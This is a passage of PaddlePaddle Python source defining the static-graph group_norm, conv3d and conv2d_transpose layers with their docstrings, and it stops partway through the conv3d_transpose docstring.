Refer to `Group Normalization <https://arxiv.org/abs/1803.08494>`_ .
Parameters:
input(Tensor): Tensor with dimension greater than 1, the data type is float32 or float64.
groups(int): The number of groups that divided from channels, the data type
is int32.
epsilon(float, optional): The small value added to the variance to prevent
division by zero, the data type is float32. Default: 1e-05.
param_attr(ParamAttr|bool, optional): ParamAttr object that specifies weight parameter
attribute. If a bool type, only False is supported, which means there is no weight parameter.
Default: None, the default weight parameter attribute is used. For more information, please
refer to :ref:`api_guide_ParamAttr` .
bias_attr(ParamAttr|bool, optional): ParamAttr object that specifies bias parameter
attribute. If a bool type, only False is supported, which means there is no bias parameter.
Default: None, the default bias parameter attribute is used. For more information, please
refer to :ref:`api_guide_ParamAttr` .
act(str, optional): Activation to be applied to the output of group normalization.
data_layout(str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, *]`.
name (str, optional): The default value is None. Normally there is no need for user to set this
property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: A Tensor has same data type and data format with `input`.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
data = paddle.static.data(name='data', shape=[2, 8, 32, 32], dtype='float32')
x = paddle.static.nn.group_norm(input=data, groups=4)
print(x.shape) # [2, 8, 32, 32]
"""
helper = LayerHelper('group_norm', **locals())
dtype = helper.input_dtype()
check_variable_and_dtype(
input, 'input', ['float32', 'float64'], 'group_norm'
)
    # create input and parameters
inputs = {'X': input}
input_shape = input.shape
if len(input_shape) < 2:
raise ValueError(
f"The dimensions of Op(static.nn.group_norm)'s input should be more than 1. But received {len(input_shape)}"
)
if data_layout != 'NCHW' and data_layout != 'NHWC':
raise ValueError(
"Param(data_layout) of Op(static.nn.group_norm) got wrong value: received "
+ data_layout
+ " but only NCHW or NHWC supported."
)
channel_num = input_shape[1] if data_layout == 'NCHW' else input_shape[-1]
param_shape = [channel_num]
if param_attr:
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0),
)
inputs['Scale'] = scale
if bias_attr:
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True
)
inputs['Bias'] = bias
# create output
mean_out = helper.create_variable(dtype=dtype, stop_gradient=True)
variance_out = helper.create_variable(dtype=dtype, stop_gradient=True)
group_norm_out = helper.create_variable(dtype=dtype)
helper.append_op(
type="group_norm",
inputs=inputs,
outputs={
"Y": group_norm_out,
"Mean": mean_out,
"Variance": variance_out,
},
attrs={
"epsilon": epsilon,
"groups": groups,
"data_layout": data_layout,
},
)
return helper.append_activation(group_norm_out)
def conv3d(
input,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format="NCDHW",
):
r"""
:api_attr: Static Graph
The convolution3D layer calculates the output based on the input, filter
and strides, paddings, dilations, groups parameters. Input(Input) and
    Output(Output) are in NCDHW or NDHWC format, where N is batch size, C is the number of
    channels, D is the depth of the feature, H is the height of the feature,
    and W is the width of the feature. Convolution3D is similar to Convolution2D
    but adds one dimension (depth). If a bias attribute and an activation type are
provided, bias is added to the output of the convolution, and the
corresponding activation function is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \ast X + b)
In the above equation:
* :math:`X`: Input value, a tensor with NCDHW or NDHWC format.
* :math:`W`: Filter value, a tensor with MCDHW format.
* :math:`\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
* :math:`\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, D_f, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
Where
.. math::
D_{out}&= \frac{(D_{in} + 2 * paddings[0] - (dilations[0] * (D_f - 1) + 1))}{strides[0]} + 1 \\
H_{out}&= \frac{(H_{in} + 2 * paddings[1] - (dilations[1] * (H_f - 1) + 1))}{strides[1]} + 1 \\
W_{out}&= \frac{(W_{in} + 2 * paddings[2] - (dilations[2] * (W_f - 1) + 1))}{strides[2]} + 1
Args:
input (Tensor): The input is 5-D Tensor with shape [N, C, D, H, W], the data
type of input is float16 or float32 or float64.
num_filters(int): The number of filter. It is as same as the output
image channel.
filter_size (int|tuple): The filter size. If filter_size is a tuple,
it must contain three integers, (filter_size_depth, filter_size_height,
filter_size_width). Otherwise, filter_size_depth = filter_size_height = \
filter_size_width = filter_size.
stride (int|tuple): The stride size. It means the stride in convolution. If stride is a
tuple, it must contain three integers, (stride_depth, stride_height, stride_width).
Otherwise, stride_depth = stride_height = stride_width = stride. Default: stride = 1.
padding (string|int|list|tuple): The padding size. It means the number of zero-paddings
on both sides for each dimension. If `padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If padding size is a tuple or list,
it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form
`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NDHWC"`, `pool_padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation (int|tuple): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain three integers, (dilation_depth, dilation_height,
dilation_width). Otherwise, dilation_depth = dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups (int): The groups number of the Conv3d Layer. According to grouped
convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1
param_attr (ParamAttr|None): The parameter attribute for learnable parameters/weights
of conv3d. If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as param_attr. If it is set to None, the parameter
is initialized with :math:`Normal(0.0, std)`, and the :math:`std` is
:math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool|None): The parameter attribute for the bias of conv3d.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn (bool): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str|None): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Tensor representing the conv3d, whose data type is
the same with input. If act is None, the tensor variable storing the
convolution result, and if act is not None, the tensor variable storing
convolution and non-linearity activation result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
        ValueError: If the channel dimension of the input is less than or equal to zero.
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ShapeError: If the input is not 5-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels * groups.
ShapeError: If the number of output channels is not be divided by groups.
Examples:
.. code-block:: python
import paddle
import numpy as np
paddle.enable_static()
data = paddle.static.data(name='data', shape=[None, 3, 12, 32, 32], dtype='float32')
param_attr = paddle.framework.ParamAttr(name='conv3d.weight', initializer=paddle.nn.initializer.XavierNormal(), learning_rate=0.001)
res = paddle.static.nn.conv3d(input=data, num_filters=2, filter_size=3, act="relu", param_attr=param_attr)
place = paddle.CPUPlace()
exe = paddle.static.Executor(place)
exe.run(paddle.static.default_startup_program())
x = np.random.rand(1, 3, 12, 32, 32).astype("float32")
output = exe.run(feed={"data": x}, fetch_list=[res])
print(output)
"""
l_type = 'conv3d'
assert param_attr is not False, "param_attr should not be False here."
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
if not isinstance(use_cudnn, bool):
raise ValueError(
"Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s. " % str(use_cudnn)
)
if data_format not in ["NCDHW", "NDHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s." % str(data_format)
)
channel_last = data_format == "NDHWC"
if len(input.shape) != 5:
raise ValueError(
"Input should be 5D tensor, but received input with the shape of {}".format(
input.shape
)
)
num_channels = input.shape[4] if channel_last else input.shape[1]
if num_channels < 0:
raise ValueError(
"The channel dimmention of the input(%s) should be defined. "
"Received: %s." % (str(input.shape), str(num_channels))
)
if groups is None:
num_filter_channels = num_channels
elif groups <= 0:
raise ValueError(
"the groups of conv3d should be greater than 0. Received groups: {}".format(
groups
)
)
else:
if num_channels % groups != 0:
raise ValueError(
"The number of input channels must be divisible by Attr(groups). "
"Received: number of channels(%s), groups(%s)."
% (str(num_channels), str(groups))
)
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 3, 'filter_size')
stride = utils.convert_to_list(stride, 3, 'stride')
dilation = utils.convert_to_list(dilation, 3, 'dilation')
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
else:
padding = utils.convert_to_list(padding, 3, 'padding')
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'."
% str(padding)
)
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0]
padding = _update_padding(padding, data_format)
input_shape = input.shape
filter_shape = [num_filters, num_filter_channels] + filter_size
def _get_default_param_initializer():
filter_elem_num = (
filter_size[0] * filter_size[1] * filter_size[2] * num_channels
)
if filter_elem_num <= 0:
raise ValueError(
"Invalid filter number, excepted number is larger than 0, but"
" received {}, please check the input shape and "
"filter size.".format(filter_elem_num)
)
std = (2.0 / filter_elem_num) ** 0.5
return Normal(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer(),
)
pre_bias = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=l_type,
inputs={
'Input': input,
'Filter': filter_param,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'use_mkldnn': False,
"padding_algorithm": padding_algorithm,
"data_format": data_format,
},
)
if data_format == 'NCDHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=4, dim_end=5)
return helper.append_activation(pre_act)
def conv2d_transpose(
input,
num_filters,
output_size=None,
filter_size=None,
padding=0,
stride=1,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format='NCHW',
):
r"""
:api_attr: Static Graph
The convolution2D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
    are in NCHW or NHWC format, where N is batch size, C is the number of channels,
H is the height of the feature, and W is the width of the feature.
Parameters(dilations, strides, paddings) are two elements. These two elements
represent height and width, respectively. The details of convolution transpose
layer, please refer to the following explanation and references
`therein <https://arxiv.org/pdf/1603.07285.pdf>`_.
    If a bias attribute and an activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \ast X + b)
Where:
* :math:`X`: Input value, a 4-D Tensor with NCHW or NHWC format.
* :math:`W`: Filter value, a 4-D Tensor with MCHW format.
* :math:`\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D Tensor with shape [M, 1].
* :math:`\sigma`: Activation function.
* :math:`Out`: Output value, a 4-D Tensor with data format 'NCHW' or 'NHWC', the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{in}, C_{out}, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H^\prime_{out} &= (H_{in} - 1) * strides[0] - pad_height_top - pad_height_bottom + dilations[0] * (H_f - 1) + 1 \\
W^\prime_{out} &= (W_{in} - 1) * strides[1] - pad_width_left - pad_width_right + dilations[1] * (W_f - 1) + 1 \\
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[0] ] \\
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[1] ]
Note:
The conv2d_transpose can be seen as the backward of the conv2d. For conv2d,
when stride > 1, conv2d maps multiple input shape to the same output shape,
so for conv2d_transpose, when stride > 1, input shape maps multiple output shape.
If output_size is None, :math:`H_{out} = H^\prime_{out}, W_{out} = W^\prime_{out}`;
else, the :math:`H_{out}` of the output size must between :math:`H^\prime_{out}`
and :math:`H^\prime_{out} + strides[0]`, and the :math:`W_{out}` of the output size must
between :math:`W^\prime_{out}` and :math:`W^\prime_{out} + strides[1]`,
conv2d_transpose can compute the kernel size automatically.
Args:
input(Tensor): 4-D Tensor with [N, C, H, W] or [N, H, W, C] format,
its data type is float32 or float64.
num_filters(int): The number of the filter. It is as same as the output
image channel.
output_size(int|tuple, optional): The output image size. If output size is a
tuple, it must contain two integers, (image_height, image_width). None if use
filter_size, padding, and stride to calculate output_size.
If output_size and filter_size are specified at the same time, They
should follow the formula above. Default: None. output_size and filter_size
should not be None at the same time.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_height, filter_size_width).
Otherwise, filter_size_height = filter_size_width = filter_size. None if
use output size to calculate filter_size. Default: None. filter_size and
output_size should not be None at the same time.
stride(int|tuple, optional): The stride size. It means the stride in transposed convolution.
If stride is a tuple, it must contain two integers, (stride_height, stride_width).
Otherwise, stride_height = stride_width = stride. Default: stride = 1.
padding(str|int|list|tuple, optional): The padding size. It means the number of zero-paddings
on both sides for each dimension. If `padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If `padding` is a tuple or list,
it could be in three forms: `[pad_height, pad_width]` or
`[pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `"NCHW"`, `padding` can be in the form
`[[0,0], [0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NHWC"`, `padding` can be in the form
`[[0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation(int|tuple, optional): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain two integers, (dilation_height, dilation_width).
Otherwise, dilation_height = dilation_width = dilation. Default: dilation = 1.
groups(int, optional): The groups number of the Conv2d transpose layer. Inspired by
grouped convolution in Alex Krizhevsky's Deep CNN paper, in which
when group=2, the first half of the filters is only connected to the
first half of the input channels, while the second half of the
filters is only connected to the second half of the input channels.
Default: groups = 1.
param_attr (ParamAttr, optional): The parameter attribute for learnable parameters/weights
of conv2d_transpose. If it is set to None or one attribute of ParamAttr, conv2d_transpose
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with Xavier. Default: None.
bias_attr (ParamAttr|bool, optional): The parameter attribute for the bias of conv2d_transpose.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv2d_transpose
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn(bool, optional): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True.
act (str, optional): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Tensor representing the conv2d_transpose, whose
data type is the same with input and shape is (num_batches, channels, out_h,
out_w) or (num_batches, out_h, out_w, channels). If act is None, the tensor
storing the transposed convolution result, and if act is not None, the
tensor storing transposed convolution and non-linearity activation
result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCHW" or "NHWC".
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ValueError: If `output_size` and filter_size are None at the same time.
ShapeError: If the input is not 4-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels.
ShapeError: If the size of `output_size` is not equal to that of `stride`.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
data = paddle.static.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
conv2d_transpose = paddle.static.nn.conv2d_transpose(input=data, num_filters=2, filter_size=3)
print(conv2d_transpose.shape) # [-1, 2, 34, 34]
"""
assert (
param_attr is not False
), "param_attr should not be False in conv2d_transpose."
if len(input.shape) != 4:
raise ValueError(
"Input size should be 4, "
"but received {}".format(len(input.shape))
)
if data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Attr(data_format) of Op(paddle.static.nn.layers.conv2d_transpose) got wrong value: received "
+ data_format
+ " but only NCHW or NHWC supported."
)
input_channel = input.shape[1] if data_format == 'NCHW' else input.shape[-1]
op_type = 'conv2d_transpose'
if (
input_channel == groups
and num_filters == input_channel
and not use_cudnn
):
op_type = 'depthwise_conv2d_transpose'
helper = LayerHelper(op_type, **locals())
if not isinstance(input, Variable):
raise TypeError("Input of conv2d_transpose must be Tensor")
stride = utils.convert_to_list(stride, 2, 'stride')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
if not isinstance(use_cudnn, bool):
raise ValueError("use_cudnn should be True or False")
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 4:
if is_list_or_tuple(padding[0]) and (data_format == "NCHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[2:4]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NHWC"):
if not (padding[0] == [0, 0] and padding[3] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[1:3]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 4, 'padding')
else:
padding = utils.convert_to_list(padding, 2, 'padding')
padding = [padding[0], padding[0], padding[1], padding[1]]
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'."
% str(padding)
)
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0, 0]
padding = _update_padding(padding, data_format)
if output_size is None:
output_size = []
elif isinstance(output_size, (list, tuple)):
if utils._contain_var(output_size):
output_size = utils._convert_to_tensor_list(output_size)
else:
output_size = utils.convert_to_list(output_size, 2, 'output_size')
elif isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 2, 'output_size')
elif isinstance(output_size, Variable):
check_dtype(
output_size.dtype,
'output_size',
['int32', 'int64'],
'conv2d_transpose',
)
if len(output_size.shape) == 1 and (
output_size.shape[0] == 1 or output_size.shape[0] == 2
):
if output_size.shape[0] == 1:
output_size = [output_size, output_size]
else:
raise ValueError("output_size must contain one or two integers.")
else:
raise ValueError(
"output_size should be int, list[int] or tuple[int] or Tensor"
)
if filter_size is None:
if output_size == []:  # note: `is []` would never match; compare by value
raise ValueError("output_size must be set when filter_size is None")
if not _non_static_mode():
if isinstance(output_size, Variable) or utils._contain_var(
output_size
):
raise ValueError(
"filter_size should not be None when output_size is Tensor or contain Tensor in static mode."
)
else:
output_size = utils.convert_shape_to_list(output_size)
if len(output_size) == 1:
output_size = utils.convert_to_list(
output_size[0], 2, 'output_size'
)
h_in = input.shape[2] if data_format == 'NCHW' else input.shape[1]
w_in = input.shape[3] if data_format == 'NCHW' else input.shape[2]
filter_size_h = (
output_size[0]
- (h_in - 1) * stride[0]
+ padding[0]
+ padding[1]
- 1
) // dilation[0] + 1
filter_size_w = (
output_size[1]
- (w_in - 1) * stride[1]
+ padding[2]
+ padding[3]
- 1
) // dilation[1] + 1
filter_size = [filter_size_h, filter_size_w]
else:
filter_size = utils.convert_to_list(
filter_size, 2, 'conv2d_transpose.filter_size'
)
if len(padding) == 4 and utils._is_symmetric_padding(padding, 2):
padding = [padding[0], padding[2]]
if groups is None:
groups = 1
elif groups <= 0:
raise ValueError(
"the groups of input must be greater than 0, "
"but received the groups of input is {}".format(groups)
)
filter_shape = [input_channel, num_filters // groups] + filter_size
img_filter = helper.create_parameter(
dtype=input.dtype, shape=filter_shape, attr=helper.param_attr
)
pre_bias = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=op_type,
inputs={'Input': [input], 'Filter': [img_filter]},
outputs={'Output': pre_bias},
attrs={
'output_size': output_size,
'strides': stride,
'paddings': padding,
'padding_algorithm': padding_algorithm,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'data_format': data_format,
},
)
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=3, dim_end=4)
out = helper.append_activation(pre_act)
return out
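# --- Illustrative sketch (not part of the Paddle API) ---------------------------------
# Shows, in plain Python, how conv2d_transpose above infers the kernel size when only
# `output_size` is given. The helper name and the example numbers are hypothetical.
def _example_infer_transpose_filter_size(out_len, in_len, stride, pad_begin, pad_end, dilation):
    # Inverse of: out_len = (in_len - 1) * stride - pad_begin - pad_end + dilation * (k - 1) + 1
    return (out_len - (in_len - 1) * stride + pad_begin + pad_end - 1) // dilation + 1
# e.g. a 32-wide input with stride 1, no padding and a requested 34-wide output
# yields a kernel size of 3, matching the docstring example above:
# _example_infer_transpose_filter_size(34, 32, 1, 0, 0, 1) == 3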
def conv3d_transpose(
input,
num_filters,
output_size=None,
filter_size=None,
padding=0,
stride=1,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format='NCDHW',
):
r"""
:api_attr: Static Graph
The convolution3D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
are in NCDHW or NDHWC format. Where N is batch size, C is the number of channels,
D is the depth of the feature, H is the height of the feature, and W
is the width of the feature. Parameters(dilations, strides, paddings) are
two elements. These two elements represent height and width, respectively.
The details of convolution transpose layer, please refer to the following
explanation and references `therein <https://arxiv.org/pdf/1603.07285.pdf>`_.
If bias attribution and activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \ast X + b)
In the above equation:
* :math:`X`: Input value, a Tensor with NCDHW or NDHWC format.
* :math:`W`: Filter value, a Tensor with MCDHW format.
* :math:`\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D Tensor with shape [M, 1].
* :math:`\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{in}, C_{out}, D_f, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
Where
.. math::
D^\prime_{out} &= (D_{in} - 1) * strides[0] - 2 * paddings[0] + dilations[0] * (D_f - 1) + 1 \\
H^\prime_{out} &= (H_{in} - 1) * strides[1] - 2 * paddings[1] + dilations[1] * (H_f - 1) + 1 \\
W^\prime_{out} &= (W_{in} - 1) * strides[2] - 2 * paddings[2] + dilations[2] * (W_f - 1) + 1 \\
D_{out} &\in [ D^\prime_{out}, D^\prime_{out} + strides[0] ] \\
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[1] ] \\
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[2] ]
Note:
The conv3d_transpose can be seen as the backward of the conv3d. For conv3d,
when stride > 1, conv3d maps multiple input shape to the same output shape,
so for conv3d_transpose, when stride > 1, input shape maps multiple output shape.
If output_size is None, :math:`D_{out} = D^\prime_{out}, H_{out} = H^\prime_{out},
W_{out} = W^\prime_{out}`; else, the :math:`D_{out}` of the output
size must be between :math:`D^\prime_{out}` and :math:`D^\prime_{out} + strides[0]`,
the :math:`H_{out}` of the output size must be between :math:`H^\prime_{out}`
and :math:`H^\prime_{out} + strides[1]`, and the :math:`W_{out}` of the output size must
be between :math:`W^\prime_{out}` and :math:`W^\prime_{out} + strides[2]`,
conv3d_transpose can compute the kernel size automatically.
Args:
input(Tensor): The input is 5-D Tensor with shape [N, C, D, H, W] or [N, D, H, W, C], the data type
of input is float32 or float64.
num_filters(int): The number of filters. It is the same as the number of output
image channels.
output_size(int|tuple, optional): The output image size. If output size is a
tuple, it must contain three integers, (image_depth, image_height, image_width). This
parameter only works when filter_size is None. If output_size and filter_size are
specified at the same time, they should follow the formula above. Default: None.
output_size and filter_size should not be None at the same time.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain three integers, (filter_size_depth, filter_size_height,
filter_size_width). Otherwise, filter_size_depth = filter_size_height = \
filter_size_width = filter_size. If None, the filter size is calculated
from output_size. Default: None. filter_size and output_size should not be
None at the same time.
padding(int|list|str|tuple, optional): The padding size. The padding argument effectively
adds `dilation * (kernel - 1)` amount of zero-padding on both sides of input. If `padding` is a string,
either 'VALID' or 'SAME' supported, which is the padding algorithm. If `padding`
is a tuple or list, it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `'NCDHW'`, `padding` can be in the form
`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `'NDHWC'`, `padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
stride(int|tuple, optional): The stride size. It means the stride in transposed convolution.
If stride is a tuple, it must contain three integers, (stride_depth, stride_height,
stride_width). Otherwise, stride_depth = stride_height = stride_width = stride.
Default: stride = 1.
dilation(int|tuple, optional): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain three integers, (dilation_depth, dilation_height,
dilation_width). Otherwise, dilation_depth = dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups(int, optional): The groups number of the Conv3d transpose layer. Inspired by
grouped convolution in Alex Krizhevsky's Deep CNN paper, in which
when group=2, the first half of the filters is only connected to the
first half of the input channels, while the second half of the
filters is only connected to the second half of the input channels.
Default: groups=1
param_attr (ParamAttr, optional): The parameter attribute for learnable parameters/weights
of conv3d_transpose. If it is set to None or one attribute of ParamAttr, conv3d_transpose
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with Xavier. Default: None.
bias_attr (ParamAttr|bool, optional): The parameter attribute for the bias of conv3d_transpose.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv3d_transpose
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn(bool, optional): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str, optional): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
